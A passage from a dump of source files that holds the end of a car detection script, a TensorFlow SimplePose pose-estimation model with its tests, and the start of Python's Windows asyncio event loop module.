nms_th,\r\n inp_dim,\r\n orig_img_size):\r\n \"\"\"\r\n processing detections\r\n \"\"\"\r\n scaling_factor = min([inp_dim / float(x)\r\n for x in orig_img_size]) # W, H scaling factor\r\n output = post_process(prediction,\r\n prob_th,\r\n num_cls,\r\n nms=True,\r\n nms_conf=nms_th,\r\n CUDA=True) # post-process such as nms\r\n\r\n if type(output) != int:\r\n output[:, [1, 3]] -= (inp_dim - scaling_factor *\r\n orig_img_size[0]) / 2.0 # x, w\r\n output[:, [2, 4]] -= (inp_dim - scaling_factor *\r\n orig_img_size[1]) / 2.0 # y, h\r\n output[:, 1:5] /= scaling_factor\r\n for i in range(output.shape[0]):\r\n output[i, [1, 3]] = torch.clamp(\r\n output[i, [1, 3]], 0.0, orig_img_size[0])\r\n output[i, [2, 4]] = torch.clamp(\r\n output[i, [2, 4]], 0.0, orig_img_size[1])\r\n return output\r\n\r\n def detect_classify(self):\r\n \"\"\"\r\n detect and classify\r\n \"\"\"\r\n for x in self.imgs_path:\r\n # read image data\r\n img = Image.open(x)\r\n img2det = process_img(img, self.inp_dim)\r\n img2det = img2det.to(device) # put image data to device\r\n\r\n # vehicle detection\r\n prediction = self.detector.forward(img2det, CUDA=True)\r\n\r\n # calculating scaling factor\r\n orig_img_size = list(img.size)\r\n output = self.process_predict(prediction,\r\n self.prob_th,\r\n self.num_classes,\r\n self.nms_th,\r\n self.inp_dim,\r\n orig_img_size)\r\n\r\n orig_img = cv2.cvtColor(np.asarray(\r\n img), cv2.COLOR_RGB2BGR) # RGB => BGR\r\n if type(output) != int:\r\n self.cls_draw_bbox(output, orig_img)\r\n dst_path = self.dst_dir + '/' + os.path.split(x)[1]\r\n if not os.path.exists(dst_path):\r\n cv2.imwrite(dst_path, orig_img)\r\n\r\n# -----------------------------------------------------------\r\n\r\n\r\nparser = argparse.ArgumentParser(description='Detect and classify cars.')\r\nparser.add_argument('-src-dir',\r\n type=str,\r\n default='./test_imgs',\r\n help='source directory of images')\r\nparser.add_argument('-dst-dir',\r\n type=str,\r\n default='./test_result',\r\n help='destination directory of images to store results.')\r\n\r\nif __name__ == '__main__':\r\n # ---------------------------- Car detect and classify\r\n # DR_model = Car_DC(src_dir='./test_imgs',\r\n # dst_dir='./test_result')\r\n # DR_model.detect_classify()\r\n\r\n args = parser.parse_args()\r\n DR_model = Car_DC(src_dir=args.src_dir, dst_dir=args.dst_dir)\r\n DR_model.detect_classify()\r\n"} {"ext": "py", "sha": "1a311287858742e4089ce0d0057dc5ae29d8da25", "content": "\"\"\"\n SimplePose for COCO Keypoint, implemented in TensorFlow.\n Original paper: 'Simple Baselines for Human Pose Estimation and Tracking,' https://arxiv.org/abs/1804.06208.\n\"\"\"\n\n__all__ = ['SimplePose', 'simplepose_resnet18_coco', 'simplepose_resnet50b_coco', 'simplepose_resnet101b_coco',\n 'simplepose_resnet152b_coco', 'simplepose_resneta50b_coco', 'simplepose_resneta101b_coco',\n 'simplepose_resneta152b_coco']\n\nimport os\nimport tensorflow as tf\ntf.random.set_seed(3)\nimport tensorflow.keras.layers as nn\nfrom .common import get_activation_layer, BatchNorm, conv1x1, HeatmapMaxDetBlock, is_channels_first\nfrom .resnet import resnet18, resnet50b, resnet101b, resnet152b\nfrom .resneta import resneta50b, resneta101b, resneta152b\n\n\nclass Deconv2d(nn.Layer):\n \"\"\"\n Standard deconvolution layer.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int, default 1\n Strides of the convolution.\n padding : int or tuple/list of 2 int, default 0\n Padding value for convolution layer.\n out_padding : int or tuple/list of 2 int, default 0\n Output padding value for deconvolution layer.\n dilation : int or tuple/list of 2 int, default 1\n Dilation value for convolution layer.\n groups : int, default 1\n Number of groups.\n use_bias : bool, default True\n Whether the layer uses a bias vector.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides=1,\n padding=0,\n out_padding=0,\n dilation=1,\n groups=1,\n use_bias=True,\n data_format=\"channels_last\",\n **kwargs):\n super(Deconv2d, self).__init__(**kwargs)\n assert (dilation == 1)\n assert (groups == 1)\n assert (in_channels is not None)\n\n if isinstance(padding, int):\n padding = (padding, padding)\n\n self.use_crop = (padding[0] > 0) or (padding[1] > 0)\n if self.use_crop:\n self.crop = nn.Cropping2D(\n cropping=padding,\n data_format=data_format,\n name=\"crop\")\n\n self.conv = nn.Conv2DTranspose(\n filters=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=\"valid\",\n output_padding=out_padding,\n data_format=data_format,\n dilation_rate=dilation,\n use_bias=use_bias,\n name=\"conv\")\n\n def call(self, x):\n x = self.conv(x)\n if self.use_crop:\n x = self.crop(x)\n return x\n\n\nclass DeconvBlock(nn.Layer):\n \"\"\"\n Deconvolution block with batch normalization and activation.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the deconvolution.\n padding : int or tuple/list of 2 int\n Padding value for deconvolution layer.\n out_padding : int or tuple/list of 2 int, default 0\n Output padding value for deconvolution layer.\n dilation : int or tuple/list of 2 int, default 1\n Dilation value for deconvolution layer.\n groups : int, default 1\n Number of groups.\n use_bias : bool, default False\n Whether the layer uses a bias vector.\n use_bn : bool, default True\n Whether to use BatchNorm layer.\n bn_eps : float, default 1e-5\n Small float added to variance in Batch norm.\n activation : function or str or None, default 'relu'\n Activation function or name of activation function.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n out_padding=0,\n dilation=1,\n groups=1,\n use_bias=False,\n use_bn=True,\n bn_eps=1e-5,\n activation=\"relu\",\n data_format=\"channels_last\",\n **kwargs):\n super(DeconvBlock, self).__init__(**kwargs)\n assert (in_channels is not None)\n self.activate = (activation is not None)\n self.use_bn = use_bn\n\n self.conv = Deconv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n out_padding=out_padding,\n dilation=dilation,\n groups=groups,\n use_bias=use_bias,\n data_format=data_format,\n name=\"conv\")\n if self.use_bn:\n self.bn = BatchNorm(\n epsilon=bn_eps,\n data_format=data_format,\n name=\"bn\")\n if self.activate:\n self.activ = get_activation_layer(activation)\n\n def call(self, x, training=None):\n x = self.conv(x)\n if self.use_bn:\n x = self.bn(x, training=training)\n if self.activate:\n x = self.activ(x)\n return x\n\n\nclass SimplePose(tf.keras.Model):\n \"\"\"\n SimplePose model from 'Simple Baselines for Human Pose Estimation and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n backbone : nn.Sequential\n Feature extractor.\n backbone_out_channels : int\n Number of output channels for the backbone.\n channels : list of int\n Number of output channels for each decoder unit.\n return_heatmap : bool, default False\n Whether to return only heatmap.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (256, 192)\n Spatial size of the expected input image.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n \"\"\"\n def __init__(self,\n backbone,\n backbone_out_channels,\n channels,\n return_heatmap=False,\n in_channels=3,\n in_size=(256, 192),\n keypoints=17,\n data_format=\"channels_last\",\n **kwargs):\n super(SimplePose, self).__init__(**kwargs)\n assert (in_channels == 3)\n self.in_size = in_size\n self.keypoints = keypoints\n self.return_heatmap = return_heatmap\n self.data_format = data_format\n\n self.backbone = backbone\n self.backbone._name = \"backbone\"\n\n self.decoder = tf.keras.Sequential(name=\"decoder\")\n in_channels = backbone_out_channels\n for i, out_channels in enumerate(channels):\n self.decoder.add(DeconvBlock(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=4,\n strides=2,\n padding=1,\n data_format=data_format,\n name=\"unit{}\".format(i + 1)))\n in_channels = out_channels\n self.decoder.add(conv1x1(\n in_channels=in_channels,\n out_channels=keypoints,\n use_bias=True,\n data_format=data_format,\n name=\"final_block\"))\n\n self.heatmap_max_det = HeatmapMaxDetBlock(\n data_format=data_format,\n name=\"heatmap_max_det\")\n\n def call(self, x, training=None):\n x = self.backbone(x, training=training)\n heatmap = self.decoder(x, training=training)\n if self.return_heatmap or not tf.executing_eagerly():\n return [heatmap]\n else:\n keypoints = self.heatmap_max_det(heatmap)\n return keypoints\n\n\ndef get_simplepose(backbone,\n backbone_out_channels,\n keypoints,\n model_name=None,\n data_format=\"channels_last\",\n pretrained=False,\n root=os.path.join(\"~\", \".tensorflow\", \"models\"),\n channels=[256, 256, 256],\n **kwargs):\n \"\"\"\n Create SimplePose model with specific parameters.\n\n Parameters:\n ----------\n backbone : nn.Sequential\n Feature extractor.\n backbone_out_channels : int\n Number of output channels for the backbone.\n keypoints : int\n Number of keypoints.\n model_name : str or None, default None\n Model name for loading pretrained model.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n\n net = SimplePose(\n backbone=backbone,\n backbone_out_channels=backbone_out_channels,\n channels=channels,\n keypoints=keypoints,\n data_format=data_format,\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import get_model_file\n in_channels = kwargs[\"in_channels\"] if (\"in_channels\" in kwargs) else 3\n input_shape = (1,) + (in_channels,) + net.in_size if net.data_format == \"channels_first\" else\\\n (1,) + net.in_size + (in_channels,)\n net.build(input_shape=input_shape)\n net.load_weights(\n filepath=get_model_file(\n model_name=model_name,\n local_model_store_dir_path=root))\n\n return net\n\n\ndef simplepose_mobilenetv2_coco(mv2_alpha=1.0, keypoints=17, data_format=\"channels_last\", **kwargs):\n backbone = tf.keras.applications.MobileNetV2(include_top=False, alpha=mv2_alpha)\n return get_simplepose(backbone, backbone_out_channels=512, keypoints=keypoints,\n model_name=\"simplepose_mobilenetv2_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_mv2_coco(keypoints=17, data_format=\"channels_last\", **kwargs):\n from .mv2_cpm import MobileNetV2\n backbone = MobileNetV2()\n return get_simplepose(backbone, backbone_out_channels=256, keypoints=keypoints,\n model_name=\"simplepose_mv2_coco\", data_format=data_format, channels=[256, 256], **kwargs)\n\n\ndef simplepose_resnet18_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-18 for COCO Keypoint from 'Simple Baselines for Human Pose Estimation and\n Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet18(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=512, keypoints=keypoints,\n model_name=\"simplepose_resnet18_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resnet50b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-50b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation and\n Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet50b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resnet50b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resnet101b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-101b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet101b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resnet101b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resnet152b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet-152b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resnet152b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resnet152b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resneta50b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet(A)-50b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resneta50b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resneta50b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resneta101b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet(A)-101b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resneta101b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resneta101b_coco\", data_format=data_format, **kwargs)\n\n\ndef simplepose_resneta152b_coco(pretrained_backbone=False, keypoints=17, data_format=\"channels_last\", **kwargs):\n \"\"\"\n SimplePose model on the base of ResNet(A)-152b for COCO Keypoint from 'Simple Baselines for Human Pose Estimation\n and Tracking,' https://arxiv.org/abs/1804.06208.\n\n Parameters:\n ----------\n pretrained_backbone : bool, default False\n Whether to load the pretrained weights for feature extractor.\n keypoints : int, default 17\n Number of keypoints.\n data_format : str, default 'channels_last'\n The ordering of the dimensions in tensors.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.tensorflow/models'\n Location for keeping the model parameters.\n \"\"\"\n backbone = resneta152b(pretrained=pretrained_backbone, data_format=data_format).features\n backbone._layers.pop()\n return get_simplepose(backbone=backbone, backbone_out_channels=2048, keypoints=keypoints,\n model_name=\"simplepose_resneta152b_coco\", data_format=data_format, **kwargs)\n\n\ndef _test():\n import numpy as np\n import tensorflow.keras.backend as K\n\n data_format = \"channels_last\"\n # data_format = \"channels_first\"\n in_size = (256, 192)\n keypoints = 17\n return_heatmap = False\n pretrained = False\n\n models = [\n simplepose_resnet18_coco,\n simplepose_resnet50b_coco,\n simplepose_resnet101b_coco,\n simplepose_resnet152b_coco,\n simplepose_resneta50b_coco,\n simplepose_resneta101b_coco,\n simplepose_resneta152b_coco,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained, in_size=in_size, return_heatmap=return_heatmap, data_format=data_format)\n\n batch = 14\n x = tf.random.normal((batch, 3, in_size[0], in_size[1]) if is_channels_first(data_format) else\n (batch, in_size[0], in_size[1], 3))\n y = net(x)\n assert (y.shape[0] == batch)\n if return_heatmap:\n if is_channels_first(data_format):\n assert ((y.shape[1] == keypoints) and (y.shape[2] == x.shape[2] // 4) and\n (y.shape[3] == x.shape[3] // 4))\n else:\n assert ((y.shape[3] == keypoints) and (y.shape[1] == x.shape[1] // 4) and\n (y.shape[2] == x.shape[2] // 4))\n else:\n assert ((y.shape[1] == keypoints) and (y.shape[2] == 3))\n\n weight_count = sum([np.prod(K.get_value(w).shape) for w in net.trainable_weights])\n print(\"m={}, {}\".format(model.__name__, weight_count))\n assert (model != simplepose_resnet18_coco or weight_count == 15376721)\n assert (model != simplepose_resnet50b_coco or weight_count == 33999697)\n assert (model != simplepose_resnet101b_coco or weight_count == 52991825)\n assert (model != simplepose_resnet152b_coco or weight_count == 68635473)\n assert (model != simplepose_resneta50b_coco or weight_count == 34018929)\n assert (model != simplepose_resneta101b_coco or weight_count == 53011057)\n assert (model != simplepose_resneta152b_coco or weight_count == 68654705)\n\n\nif __name__ == \"__main__\":\n _test()\n"} {"ext": "py", "sha": "1a311573372ab9525196d1108623bb785e20284c", "content": "\"\"\"Selector and proactor event loops for Windows.\"\"\"\r\n\r\nimport _overlapped\r\nimport _winapi\r\nimport errno\r\nimport math\r\nimport msvcrt\r\nimport socket\r\nimport struct\r\nimport time\r\nimport weakref\r\n\r\nfrom . import events\r\nfrom . import base_subprocess\r\nfrom . import futures\r\nfrom . import exceptions\r\nfrom . import proactor_events\r\nfrom . import selector_events\r\nfrom . import tasks\r\nfrom . import windows_utils\r\nfrom .log import logger\r\n\r\n\r\n__all__ = (\r\n 'SelectorEventLoop', 'ProactorEventLoop', 'IocpProactor',\r\n 'DefaultEventLoopPolicy', 'WindowsSelectorEventLoopPolicy',\r\n 'WindowsProactorEventLoopPolicy',\r\n)\r\n\r\n\r\nNULL = 0\r\nINFINITE = 0xffffffff\r\nERROR_CONNECTION_REFUSED = 1225\r\nERROR_CONNECTION_ABORTED = 1236\r\n\r\n# Initial delay in seconds for connect_pipe() before retrying to connect\r\nCONNECT_PIPE_INIT_DELAY = 0.001\r\n\r\n# Maximum delay in seconds for connect_pipe() before retrying to connect\r\nCONNECT_PIPE_MAX_DELAY = 0.100\r\n\r\n\r\nclass _OverlappedFuture(futures.Future):\r\n \"\"\"Subclass of Future which represents an overlapped operation.\r\n\r\n Cancelling it will immediately cancel the overlapped operation.\r\n \"\"\"\r\n\r\n def __init__(self, ov, *, loop=None):\r\n super().__init__(loop=loop)\r\n if self._source_traceback:\r\n del self._source_traceback[-1]\r\n self._ov = ov\r\n\r\n def _repr_info(self):\r\n info = super()._repr_info()\r\n if self._ov is not None:\r\n state = 'pending' if self._ov.pending else 'completed'\r\n info.insert(1, f'overlapped=<{state}, {self._ov.address:#x}>')\r\n return info\r\n\r\n def _cancel_overlapped(self):\r\n if self._ov is None:\r\n return\r\n try:\r\n self._ov.cancel()\r\n except OSError as exc:\r\n context = {\r\n 'message': 'Cancelling an overlapped future failed',\r\n 'exception': exc,\r\n 'future': self,\r\n }\r\n if self._source_traceback:\r\n context['source_traceback'] = self._source_traceback\r\n self._loop.call_exception_handler(context)\r\n self._ov = None\r\n\r\n def cancel(self, msg=None):\r\n self._cancel_overlapped()\r\n return super().cancel(msg=msg)\r\n\r\n def set_exception(self, exception):\r\n super().set_exception(exception)\r\n self._cancel_overlapped()\r\n\r\n def set_result(self, result):\r\n super().set_result(result)\r\n self._ov = None\r\n\r\n\r\nclass _BaseWaitHandleFuture(futures.Future):\r\n \"\"\"Subclass of Future which represents a wait handle.\"\"\"\r\n\r\n def __init__(self, ov, handle, wait_handle, *, loop=None):\r\n super().__init__(loop=loop)\r\n if self._source_traceback:\r\n del self._source_traceback[-1]\r\n # Keep a reference to the Overlapped object to keep it alive until the\r\n # wait is unregistered\r\n self._ov = ov\r\n self._handle = handle\r\n self._wait_handle = wait_handle\r\n\r\n # Should we call UnregisterWaitEx() if the wait completes\r\n # or is cancelled?\r\n self._registered = True\r\n\r\n def _poll(self):\r\n # non-blocking wait: use a timeout of 0 millisecond\r\n return (_winapi.WaitForSingleObject(self._handle, 0) ==\r\n _winapi.WAIT_OBJECT_0)\r\n\r\n def _repr_info(self):\r\n info = super()._repr_info()\r\n info.append(f'handle={self._handle:#x}')\r\n if self._handle is not None:\r\n state = 'signaled' if self._poll() else 'waiting'\r\n info.append(state)\r\n if self._wait_handle is not None:\r\n info.append(f'wait_handle={self._wait_handle:#x}')\r\n return info\r\n\r\n def _unregister_wait_cb(self, fut):\r\n # The wait was unregistered: it's not safe to destroy the Overlapped\r\n # object\r\n self._ov = None\r\n\r\n def _unregister_wait(self):\r\n if not self._registered:\r\n return\r\n self._registered = False\r\n\r\n wait_handle = self._wait_handle\r\n self._wait_handle = None\r\n try:\r\n _overlapped.UnregisterWait(wait_handle)\r\n except OSError as exc:\r\n if exc.winerror != _overlapped.ERROR_IO_PENDING:\r\n context = {\r\n 'message': 'Failed to unregister the wait handle',\r\n 'exception': exc,\r\n 'future': self,\r\n }\r\n if self._source_traceback:\r\n context['source_traceback'] = self._source_traceback\r\n self._loop.call_exception_handler(context)\r\n return\r\n # ERROR_IO_PENDING means that the unregister is pending\r\n\r\n self._unregister_wait_cb(None)\r\n\r\n def cancel(self, msg=None):\r\n self._unregister_wait()\r\n return super().cancel(msg=msg)\r\n\r\n def set_exception(self, exception):\r\n self._unregister_wait()\r\n super().set_exception(exception)\r\n\r\n def set_result(self, result):\r\n self._unregister_wait()\r\n super().set_result(result)\r\n\r\n\r\nclass _WaitCancelFuture(_BaseWaitHandleFuture):\r\n \"\"\"Subclass of Future which represents a wait for the cancellation of a\r\n _WaitHandleFuture using an event.\r\n \"\"\"\r\n\r\n def __init__(self, ov, event, wait_handle, *, loop=None):\r\n super().__init__(ov, event, wait_handle, loop=loop)\r\n\r\n self._done_callback = None\r\n\r\n def cancel(self):\r\n raise RuntimeError(\"_WaitCancelFuture must not be cancelled\")\r\n\r\n def set_result(self, result):\r\n super().set_result(result)\r\n if self._done_callback is not None:\r\n self._done_callback(self)\r\n\r\n def set_exception(self, exception):\r\n super().set_exception(exception)\r\n if self._done_callback is not None:\r\n self._done_callback(self)\r\n\r\n\r\nclass _WaitHandleFuture(_BaseWaitHandleFuture):\r\n def __init__(self, ov, handle, wait_handle, proactor, *, loop=None):\r\n super().__init__(ov, handle, wait_handle, loop=loop)\r\n self._proactor = proactor\r\n self._unregister_proactor = True\r\n self._event = _overlapped.CreateEvent(None, True, False, None)\r\n self._event_fut = None\r\n\r\n def _unregister_wait_cb(self, fut):\r\n if self._event is not None:\r\n _winapi.CloseHandle(self._event)\r\n self._event = None\r\n self._event_fut = None\r\n\r\n # If the wait was cancelled, the wait may never be signalled, so\r\n # it's required to unregister it. Otherwise, IocpProactor.close() will\r\n # wait forever for an event which will never come.\r\n #\r\n # If the IocpProactor already received the event, it's safe to call\r\n # _unregister() because we kept a reference to the Overlapped object\r\n # which is used as a unique key.\r\n self._proactor._unregister(self._ov)\r\n self._proactor = None\r\n\r\n super()._unregister_wait_cb(fut)\r\n\r\n def _unregister_wait(self):\r\n if not self._registered:\r\n return\r\n self._registered = False\r\n\r\n wait_handle = self._wait_handle\r\n self._wait_handle = None\r\n try:\r\n _overlapped.UnregisterWaitEx(wait_handle, self._event)\r\n except OSError as exc:\r\n if exc.winerror != _overlapped.ERROR_IO_PENDING:\r\n context = {\r\n 'message': 'Failed to unregister the wait handle',\r\n 'exception': exc,\r\n 'future': self,\r\n }\r\n if self._source_traceback:\r\n context['source_traceback'] = self._source_traceback\r\n self._loop.call_exception_handler(context)\r\n return\r\n # ERROR_IO_PENDING is not an error, the wait was unregistered\r\n\r\n self._event_fut = self._proactor._wait_cancel(self._event,\r\n self._unregister_wait_cb)\r\n\r\n\r\nclass PipeServer(object):\r\n \"\"\"Class representing a pipe server.\r\n\r\n This is much like a bound, listening socket.\r\n \"\"\"\r\n def __init__(self, address):\r\n self._address = address\r\n self._free_instances = weakref.WeakSet()\r\n # initialize the pipe attribute before calling _server_pipe_handle()\r\n # because this function can raise an exception and the destructor calls\r\n # the close() method\r\n self._pipe = None\r\n self._accept_pipe_future = None\r\n self._pipe = self._server_pipe_handle(True)\r\n\r\n def _get_unconnected_pipe(self):\r\n # Create new instance and return previous one. This ensures\r\n # that (until the server is closed) there is always at least\r\n # one pipe handle for address. Therefore if a client attempt\r\n # to connect it will not fail with FileNotFoundError.\r\n tmp, self._pipe = self._pipe, self._server_pipe_handle(False)\r\n return tmp\r\n\r\n def _server_pipe_handle(self, first):\r\n # Return a wrapper for a new pipe handle.\r\n if self.closed():\r\n return None\r\n flags = _winapi.PIPE_ACCESS_DUPLEX | _winapi.FILE_FLAG_OVERLAPPED\r\n if first:\r\n flags |= _winapi.FILE_FLAG_FIRST_PIPE_INSTANCE\r\n h = _winapi.CreateNamedPipe(\r\n self._address, flags,\r\n _winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE |\r\n _winapi.PIPE_WAIT,\r\n _winapi.PIPE_UNLIMITED_INSTANCES,\r\n windows_utils.BUFSIZE, windows_utils.BUFSIZE,\r\n _winapi.NMPWAIT_WAIT_FOREVER, _winapi.NULL)\r\n pipe = windows_utils.PipeHandle(h)\r\n self._free_instances.add(pipe)\r\n return pipe\r\n\r\n def closed(self):\r\n return (self._address is None)\r\n\r\n def close(self):\r\n if self._accept_pipe_future is not None:\r\n self._accept_pipe_future.cancel()\r\n self._accept_pipe_future = None\r\n # Close all instances which have not been connected to by a client.\r\n if self._address is not None:\r\n for pipe in self._free_instances:\r\n pipe.close()\r\n self._pipe = None\r\n self._address = None\r\n self._free_instances.clear()\r\n\r\n __del__ = close\r\n\r\n\r\nclass _WindowsSelectorEventLoop(selector_events.BaseSelectorEventLoop):\r\n \"\"\"Windows version of selector event loop.\"\"\"\r\n\r\n\r\nclass ProactorEventLoop(proactor_events.BaseProactorEventLoop):\r\n \"\"\"Windows version of proactor event loop using IOCP.\"\"\"\r\n\r\n def __init__(self, proactor=None):\r\n if proactor is None:\r\n proactor = IocpProactor()\r\n super().__init__(proactor)\r\n\r\n def run_forever(self):\r\n try:\r\n assert self._self_reading_future is None\r\n self.call_soon(self._loop_self_reading)\r\n super().run_forever()\r\n finally:\r\n if self._self_reading_future is not None:\r\n ov = self._self_reading_future._ov\r\n self._self_reading_future.cancel()\r\n # self_reading_future was just cancelled so if it hasn't been\r\n # finished yet, it never will be (it's possible that it has\r\n # already finished and its callback is waiting in the queue,\r\n # where it could still happen if the event loop is restarted).\r\n # Unregister it otherwise IocpProactor.close will wait for it\r\n # forever\r\n if ov is not None:\r\n self._proactor._unregister(ov)\r\n self._self_reading_future = None\r\n\r\n async def create_pipe_connection(self, protocol_factory, address):\r\n f = self._proactor.connect_pipe(address)\r\n pipe = await f\r\n protocol = protocol_factory()\r\n trans = self._make_duplex_pipe_transport(pipe, protocol,\r\n extra={'addr': address})\r\n return trans, protocol\r\n\r\n async def start_serving_pipe(self, protocol_factory, address):\r\n server = PipeServer(address)\r\n\r\n def loop_accept_pipe(f=None):\r\n pipe = None\r\n try:\r\n if f:\r\n pipe = f.result()\r\n server._free_instances.discard(pipe)\r\n\r\n if server.closed():\r\n # A client connected before the server was closed:\r\n # drop the client (close the pipe) and exit\r\n pipe.close()\r\n return\r\n\r\n protocol = protocol_factory()\r\n self._make_duplex_pipe_transport(\r\n pipe, protocol, extra={'addr': address})\r\n\r\n pipe = server._get_unconnected_pipe()\r\n if pipe is None:\r\n return\r\n\r\n f = self._proactor.accept_pipe(pipe)\r\n except OSError as exc:\r\n if pipe and pipe.fileno() != -1:\r\n self.call_exception_handler({\r\n 'message': 'Pipe accept failed',\r\n 'exception': exc,\r\n 'pipe': pipe,\r\n })\r\n pipe.close()\r\n elif self._debug:\r\n logger.warning(\"Accept pipe failed on pipe %r\",\r\n pipe, exc_info=True)\r\n except exceptions.CancelledError:\r\n if pipe:\r\n pipe.close()\r\n else:\r\n server._accept_pipe_future = f\r\n f.add_done_callback(loop_accept_pipe)\r\n\r\n self.call_soon(loop_accept_pipe)\r\n return [server]\r\n\r\n async def _make_subprocess_transport(self, protocol, args, shell,\r\n stdin, stdout, stderr, bufsize,\r\n extra=None, **kwargs):\r\n waiter = self.create_future()\r\n transp = 